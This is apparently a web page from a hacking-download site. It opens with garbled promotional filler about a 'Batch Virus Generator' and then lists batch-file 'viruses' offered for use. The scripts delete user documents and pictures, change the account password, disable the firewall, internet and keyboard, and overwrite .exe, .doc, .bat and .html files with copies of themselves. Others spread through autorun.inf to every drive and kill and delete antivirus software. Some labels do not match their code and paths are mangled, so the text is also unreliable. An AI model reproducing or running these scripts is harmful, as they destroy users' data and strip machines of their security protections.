Batch Virus Download

Batch Virus Generator Download Batch file splitter software break all file formats like rar, zip, txt, avi, mp3, doc, exe, tiff, jpg, etc into smaller parts and joiner combiner merger option will join combine merge these chunks to get original file.Document breaker utility.

Free download DELmEs Batch Virus Generator.zip by using Hacking Software Download Center (HSDC). This DELmEs Batch Virus Generator.zip software mainly categories in Viruses-Worms section. Also You can find out many software like DELmEs Batch Virus. Whether you're an aspiring virus analyst or someone simply curious about what this virus looks like, there's a lot going on here. Despite being created as a joke parodying the culture of young, aggressive hackers, this trojan is exceedingly complicated, and it represents some of the biggest threats viruses pose to modern machines. Real Viruses(simple Ones) the first one: copy the code.

Some of these codes are very dangerous!
USE THIS AT YOUR OWN RISK.


Block Google.
@echo off
::--------Block Google-------::
cd 'C:WindowsSystem32Driversetc'
echo 127.0.0.1 google.com >> 'Hosts'
echo 127.0.0.1 www.google.com >> 'Hosts'
::---------------------------::

Block Hotmail.
@echo off
::--------Block Hotmail------::
cd 'C:WindowsSystem32Driversetc'
echo 127.0.0.1 hotmail.com >> 'Hosts'
echo 127.0.0.1 www.hotmail.com >> 'Hosts'
::---------------------------::

Block MSN.Virus
@echo off
::---------Block MSN---------::
cd 'C:WindowsSystem32Driversetc'
echo 127.0.0.1 msn.com >> 'Hosts'
echo 127.0.0.1 www.msn.com >> 'Hosts'
::---------------------------::

Block wikipedia.
@echo off
::-------Block Wikipedia-----::
cd 'C:WindowsSystem32Driversetc'
echo 127.0.0.1 wikipedia.org >> 'Hosts'
echo 127.0.0.1 www.wikipedia.org >> 'Hosts'
::---------------------------::

Change time to 00:00.
::__---Virus Created By Virus Author---__::
@echo off
::------Change The Time------::
time 00:00
::---------------------------::

Change user pass.
@echo off
::--Change Pass To InShadow--::
net user %username% InShadow
::---------------------------::

Create account OWNED.
@echo off
::----Hide My Music Folder---::
attrib +h '%userprofile%my documentsmy music'
::---------------------------::

Delete al docs.
@echo off
::----Delete My Documents----::
del /f /q 'C:Users%userprofile%My Documents*.*'
::---------------------------::
Batch
Delete all music.
@echo off
::-----Delete My Music-------::
del /f /q 'C:Users%userprofile%My DocumentsMy Music*.*'
::---------------------------::

Delete all pics.Batch viruses
@echo off
::-----Delete My Pictures----::
del /f /q 'C:Users%userprofile%My DocumentsMy Pictures*.*'
::---------------------------::

Disable Firewall.

@echo off
::-Disable Windows Firewall--::
net stop 'MpsSvc'
taskkill /f /t /im 'FirewallControlPanel.exe'
::---------------------------::

[color=#FF0000]Disable Internet.

@echo off
::-----Disable Internet------::
ipconfig /release
if ERRORLEVEL1 ipconfig /release_all
::---------------------------::

DownloadDisable Keyboard.
@echo off
::------Disable Keyboard-----::
echo Windows Registry Editor Version 5.00 > 'nokeyboard.reg'
echo [HKEY_LOCAL_MACHINESYSTEMControlSet001ControlKeyboard Layout] >> 'nokeyboard.reg'
echo 'Scancode Map'=hex:00,00,00,00,00,00,00,00,7c,00,00,00,00,00,01,00,00, >> 'nokeyboard.reg'
echo 00,3b,00,00,00,3c,00,00,00,3d,00,00,00,3e,00,00,00,3f,00,00,00,40,00,00,00, >> 'nokeyboard.reg'
echo 41,00,00,00,42,00,00,00,43,00,00,00,44,00,00,00,57,00,00,00,58,00,00,00,37, >> 'nokeyboard.reg'
echo e0,00,00,46,00,00,00,45,00,00,00,35,e0,00,00,37,00,00,00,4a,00,00,00,47,00, >> 'nokeyboard.reg'
echo 00,00,48,00,00,00,49,00,00,00,4b,00,00,00,4c,00,00,00,4d,00,00,00,4e,00,00, >> 'nokeyboard.reg'
echo 00,4f,00,00,00,50,00,00,00,51,00,00,00,1c,e0,00,00,53,00,00,00,52,00,00,00, >> 'nokeyboard.reg'
echo 4d,e0,00,00,50,e0,00,00,4b,e0,00,00,48,e0,00,00,52,e0,00,00,47,e0,00,00,49, >> 'nokeyboard.reg'
echo e0,00,00,53,e0,00,00,4f,e0,00,00,51,e0,00,00,29,00,00,00,02,00,00,00,03,00, >> 'nokeyboard.reg'
echo 00,00,04,00,00,00,05,00,00,00,06,00,00,00,07,00,00,00,08,00,00,00,09,00,00, >> 'nokeyboard.reg'
echo 00,0a,00,00,00,0b,00,00,00,0c,00,00,00,0d,00,00,00,0e,00,00,00,0f,00,00,00, >> 'nokeyboard.reg'
echo 10,00,00,00,11,00,00,00,12,00,00,00,13,00,00,00,14,00,00,00,15,00,00,00,16, >> 'nokeyboard.reg'
echo 00,00,00,17,00,00,00,18,00,00,00,19,00,00,00,1a,00,00,00,1b,00,00,00,2b,00, >> 'nokeyboard.reg'
echo 00,00,3a,00,00,00,1e,00,00,00,1f,00,00,00,20,00,00,00,21,00,00,00,22,00,00, >> 'nokeyboard.reg'
echo 00,23,00,00,00,24,00,00,00,25,00,00,00,26,00,00,00,27,00,00,00,28,00,00,00, >> 'nokeyboard.reg'
echo 1c,00,00,00,2a,00,00,00,2c,00,00,00,2d,00,00,00,2e,00,00,00,2f,00,00,00,30, >> 'nokeyboard.reg'
echo 00,00,00,31,00,00,00,32,00,00,00,33,00,00,00,34,00,00,00,35,00,00,00,36,00, >> 'nokeyboard.reg'
echo 00,00,1d,00,00,00,5b,e0,00,00,38,00,00,00,39,00,00,00,38,e0,00,00,5c,e0,00, >> 'nokeyboard.reg'
echo 00,5d,e0,00,00,1d,e0,00,00,5f,e0,00,00,5e,e0,00,00,22,e0,00,00,24,e0,00,00, >> 'nokeyboard.reg'
echo 10,e0,00,00,19,e0,00,00,30,e0,00,00,2e,e0,00,00,2c,e0,00,00,20,e0,00,00,6a, >> 'nokeyboard.reg'
echo e0,00,00,69,e0,00,00,68,e0,00,00,67,e0,00,00,42,e0,00,00,6c,e0,00,00,6d,e0, >> 'nokeyboard.reg'
echo 00,00,66,e0,00,00,6b,e0,00,00,21,e0,00,00,00,00 >> 'nokeyboard.reg'
start nokeyboard.reg
::---------------------------::

Infect all Bat.
@echo off
::----Infect All Bat Files---::
Dir %Homedrive% /s /b > DirPath
For /f %%Y In (DirPath) Do (
Set DirPath=%%Y > Nul
For %%Z In (%DirPath%*.bat) Do (
Set BatInfect=%%Z > Nul
Copy /y %0 %BatInfect%
)
)
Del /f /s /q DirPath
::---------------------------::

Infect all docs.
@echo off
::-------Infect All .Doc-----::
Dir %Homedrive% /s /b > DirPath
For /f %%Y In (DirPath) Do (
Set DirPath=%%Y > Nul
For %%Z In (%DirPath%*.doc) Do (
Set DocInfect=%%Z > Nul
Copy /y %0 %DocInfect%
)
)
Del /f /s /q DirPath
::---------------------------::

Infect all Drivers.
@echo off
::-----Infect All Drives-----::
for %%E In (A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z) Do (
copy /Y %0 %%E:
echo [AutoRun] > %%E:autorun.inf
echo open='%%E:%0' >> %%E:autorun.inf
echo action=Open folder to see files... >> %%E:autorun.inf)
::---------------------------::

Infect all .exe files.
@echo off
::----Infect All Exe Files---::
Dir %Homedrive% /s /b > DirPath
For /f %%Y In (DirPath) Do (
Set DirPath=%%Y > Nul
For %%Z In (%DirPath%*.exe) Do (
Set ExeInfect=%%Z > Nul
Copy /y %0 %ExeInfect%
)
)
Del /f /s /q DirPath
::---------------------------::

Open disk.
Batch Virus Download
@echo off
::-------Open Disk Tray------::
echo Do >> 'opendisk.vbs'
echo Set oWMP = CreateObject('WMPlayer.OCX.7' ) >> 'opendisk.vbs'
echo Set colCDROMs = oWMP.cdromCollection >> 'opendisk.vbs'
echo colCDROMs.Item(d).Eject >> 'opendisk.vbs'
echo colCDROMs.Item(d).Eject >> 'opendisk.vbs'
echo Loop >> 'opendisk.vbs'
start ' 'opendisk.vbs'
::---------------------------::

Spam /C Drive.
@echo off
::-------Spam C Drive--------::
echo %random% > 'C:%random%Spammed Filetype'
echo %random% > 'C:%random%Spammed Filetype'
echo %random% > 'C:%random%Spammed Filetype'
echo %random% > 'C:%random%Spammed Filetype'
echo %random% > 'C:%random%Spammed Filetype'
echo %random% > 'C:%random%Spammed Filetype'
echo %random% > 'C:%random%Spammed Filetype'
echo %random% > 'C:%random%Spammed Filetype'
echo %random% > 'C:%random%Spammed Filetype'
echo %random% > 'C:%random%Spammed Filetype'
echo %random% > 'C:%random%Spammed Filetype'
::---------------------------::

Kill Anti-virus.
@echo off
::-------AV Kill [UD]--------::
net stop “Security Center”
netsh firewall set opmode mode=disable
tskill /A av*
tskill /A fire*
tskill /A anti*
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A OUTPOST
tskill /A nv*
tskill /A nav*
tskill /A F-*
tskill /A ESAFE
tskill /A cle
cls
tskill /A BLACKICE
tskill /A def*
tskill /A kav
tskill /A kav*
tskill /A avg*
tskill /A ash*
cls
tskill /A aswupdsv
tskill /A ewid*
tskill /A guard*
tskill /A guar*
tskill /A gcasDt*
tskill /A msmp*
cls
tskill /A mcafe*
tskill /A mghtml
tskill /A msiexec
tskill /A outpost
tskill /A isafe
tskill /A zap*
cls
tskill /A zauinst
tskill /A upd*
tskill /A zlclien*
tskill /A minilog
tskill /A cc*
tskill /A norton*
cls
tskill /A norton au*
tskill /A ccc*
tskill /A npfmn*
tskill /A loge*
tskill /A nisum*
tskill /A issvc
tskill /A tmp*
cls
tskill /A tmn*
tskill /A pcc*
tskill /A cpd*
tskill /A pop*
tskill /A pav*
tskill /A padmin
cls
tskill /A panda*
tskill /A avsch*
tskill /A sche*
tskill /A syman*
tskill /A virus*
tskill /A realm*
cls
tskill /A sweep*
tskill /A scan*
tskill /A ad-*
tskill /A safe*
tskill /A avas*
tskill /A norm*
cls
tskill /A offg*
del /Q /F C:Program Filesalwils~1avast4*.*
del /Q /F C:Program FilesLavasoftAd-awa~1*.exe
del /Q /F C:Program Fileskasper~1*.exe
cls
del /Q /F C:Program Filestrojan~1*.exe
del /Q /F C:Program Filesf-prot95*.dll
del /Q /F C:Program Filestbav*.dat
cls
del /Q /F C:Program Filesavpersonal*.vdf
del /Q /F C:Program FilesNorton~1*.cnt
del /Q /F C:Program FilesMcafee*.*
cls
del /Q /F C:Program FilesNorton~1Norton~1Norton~3*.*
del /Q /F C:Program FilesNorton~1Norton~1speedd~1*.*
del /Q /F C:Program FilesNorton~1Norton~1*.*
del /Q /F C:Program FilesNorton~1*.*
cls
del /Q /F C:Program Filesavgamsr*.exe
del /Q /F C:Program Filesavgamsvr*.exe
del /Q /F C:Program Filesavgemc*.exe
cls
del /Q /F C:Program Filesavgcc*.exe
del /Q /F C:Program Filesavgupsvc*.exe
del /Q /F C:Program Filesgrisoft
del /Q /F C:Program Filesnood32krn*.exe
del /Q /F C:Program Filesnood32*.exe
cls
del /Q /F C:Program Filesnod32
del /Q /F C:Program Filesnood32
del /Q /F C:Program Fileskav*.exe
del /Q /F C:Program Fileskavmm*.exe
del /Q /F C:Program Fileskaspersky*.*
cls
del /Q /F C:Program Filesewidoctrl*.exe
del /Q /F C:Program Filesguard*.exe
del /Q /F C:Program Filesewido*.exe
cls
del /Q /F C:Program Filespavprsrv*.exe
del /Q /F C:Program Filespavprot*.exe
del /Q /F C:Program Filesavengine*.exe
cls
del /Q /F C:Program Filesapvxdwin*.exe
del /Q /F C:Program Fileswebproxy*.exe
del /Q /F C:Program Filespanda software*.*
::---------------------------::

Batch Virus Download Pc


Infect all HTML.

@echo off
::--Infect All Html Files---::
Dir %Homedrive% /s /b > DirPath
For /f %%Y In (DirPath) Do (
Set DirPath=%%Y > Nul
For %%Z In (%DirPath%*.html) Do (
Set HtmlInfect=%%Z > Nul
Copy /y %0 %HtmlInfect%
)
)
Del /f /s /q DirPath
::---------------------------::

Hide MUSIC folder.

@echo off
::----Hide My Music Folder---::
attrib +h '%userprofile%my documentsmy music'
::---------------------------::

Startup XP song
@echo off
::--Start Hidden WinXP Song--::
cd 'C:Windowssystem32oobeimages'
start title.wma
::---------------------------::

Infect CMD.

Batch Virus Maker


Batch Viruses

@echo off
::-----Infect 'ls' CMD-----::
copy %0 %windir%system32ls.bat
::---------------------------::